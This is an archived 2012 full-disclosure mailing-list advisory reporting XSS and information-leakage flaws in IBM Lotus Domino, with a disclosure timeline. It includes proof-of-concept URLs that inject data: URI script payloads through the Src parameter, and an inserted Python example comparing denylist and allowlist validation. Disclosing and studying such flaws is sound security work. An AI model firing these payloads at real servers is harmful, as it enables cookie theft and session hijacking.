Open Source and information security mailing list archives
Message-ID: <006601cd8935$3fcfafe0$9b7a6fd5@ml>
Date: Sun, 2 Sep 2012 21:02:11 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: XSS and IL vulnerabilities in IBM Lotus Domino

Hello list!

I want to warn you about Cross-Site Scripting and Information Leakage
vulnerabilities in IBM Lotus Domino. On 15 August IBM released an
advisory concerning these Cross-Site Scripting vulnerabilities.

CVE ID: CVE-2012-3302.

-------------------------
Affected products:
-------------------------

IBM Lotus Domino 8.5.3 and earlier versions are vulnerable. The XSS
vulnerabilities will be fixed in Domino 8.5.4; IBM is still working on the
Information Leakage and other vulnerabilities that I have reported to
them.

For fixes, workarounds and mitigations, refer to the IBM Security Bulletin:
http://www-01.ibm.com/support/docview.wss?uid=swg21608160

----------
Details:
----------

XSS (WASC-08):

In March 2008 this XSS worked in the following way:

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//

Since then the attack vector via the javascript: URI has been fixed (it is
quite possible that my German client informed IBM in 2008 about the multiple
holes I found in Domino). But it is still possible to attack via data: and
vbscript: URIs.

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
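The pattern above, a fix that blocks the javascript: scheme while data: and vbscript: still pass, is why a frame-source parameter such as Src should be validated against an allowlist rather than a denylist. The following Python check is an added example, not code from this post or from IBM; the function names, the host name "site" and the sample inputs are assumptions/constructed for illustration.

```python
from urllib.parse import unquote, urlsplit

# Added, constructed example (not IBM's or the post author's code). It models
# two ways of validating a frame-source parameter such as Domino's "Src".

ALLOWED_SCHEMES = {"http", "https"}


def denylist_check(src: str) -> bool:
    """Weak approach: reject only the javascript: scheme, as the post says the
    original vector was fixed. Every other scheme (data:, vbscript:, ...) passes."""
    return not src.strip().lower().startswith("javascript:")


def allowlist_check(src: str, own_host: str) -> bool:
    """Robust approach: accept only an in-application relative path or an
    absolute http(s) URL on the application's own host (own_host is assumed)."""
    decoded = unquote(src)
    # Browsers tolerate control characters inside a scheme, so refuse such
    # input outright instead of trying to normalise it away.
    if any(ord(c) < 0x20 for c in decoded) or decoded != decoded.strip():
        return False
    parts = urlsplit(decoded)
    if parts.scheme:  # urlsplit already lower-cases the scheme
        return (parts.scheme in ALLOWED_SCHEMES
                and (parts.hostname or "").lower() == own_host.lower())
    # No scheme: allow a plain relative path only, never a protocol-relative
    # "//host/..." reference that points at another origin.
    return not decoded.startswith(("//", "\\"))


# Constructed inputs: the post's data: and javascript: payloads, a harmless
# in-application path, a same-host URL and a protocol-relative foreign host.
SAMPLES = {
    "data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E": False,
    "javascript:alert(document.cookie);//": False,
    "Topic": True,
    "https://site/help/lccon.nsf/Main?OpenFrameSet": True,
    "//attacker.invalid/": False,
}


def audit(own_host: str = "site") -> dict:
    """For each sample, report whether the denylist and the allowlist check
    each reach the expected verdict (True = correct)."""
    return {s: (denylist_check(s) == want, allowlist_check(s, own_host) == want)
            for s, want in SAMPLES.items()}


if __name__ == "__main__":
    for s, (deny_ok, allow_ok) in audit().items():
        print(f"{s!r}: denylist_correct={deny_ok} allowlist_correct={allow_ok}")
```

Running it shows the denylist wrongly accepting the data: payload while the allowlist rejects every foreign scheme and origin but still admits the application's own paths.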

Information Leakage (WASC-13):

The page https://site/domcfg.nsf, which is accessible without authentication,
leaks information about the Web Server Configuration. I have seen this
situation on many sites running Lotus Domino.

------------
Timeline:
------------

- Between 16.05 and 20.05 I wrote announcements about multiple vulnerabilities
in IBM software at my site.
- Between 16.05 and 20.05 I sent five advisories via the contact form at IBM's
site. No reaction from "IT security".
- On 20.05 I contacted "Software support". Received a formal answer.
- On 20.05 I informed support that these are security issues (not something
small which they can just ignore) and that they need to send them to the
security department. Again received a formal answer - this time with a
"call me maybe" paragraph. In the end IBM employees just ignored it.
- On 30.05 I contacted IBM PSIRT directly. They said they had not received
anything, neither from me via the contact form nor from support. Likewise,
they had done nothing (no security audit of their software) about these
multiple vulnerabilities in multiple IBM products getting out into the wild.
- On 31.05 I resent the five advisories, which they received and said they
would send to the developers (of Lotus products).
- On 06.06, after silence from PSIRT, I reminded them. They said there was
still no information from the developers.
- On 10.07, after more than a month of silence since the last contact from
PSIRT, I reminded them. No answer from them. It looks like IBM developers have
decided to ignore these vulnerabilities.
- On 14.07 I informed IBM PSIRT that, because they were ignoring me, I planned
public disclosure of these vulnerabilities in July.
- On 18.07, 12:06 AM, PSIRT answered (after 1.5 months of silence) and said
that the previous day they had had a meeting with the developers, who were
working on these issues and had started to fix them. No concrete deadline;
they had just started.
- On 15.08 IBM released their advisory (about the Cross-Site Scripting and HTTP
Response Splitting holes - just a few of the total number of holes).
- On 27.08.2012 I disclosed these vulnerabilities (first advisory) at my
site (http://websecurity.com.ua/5826/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
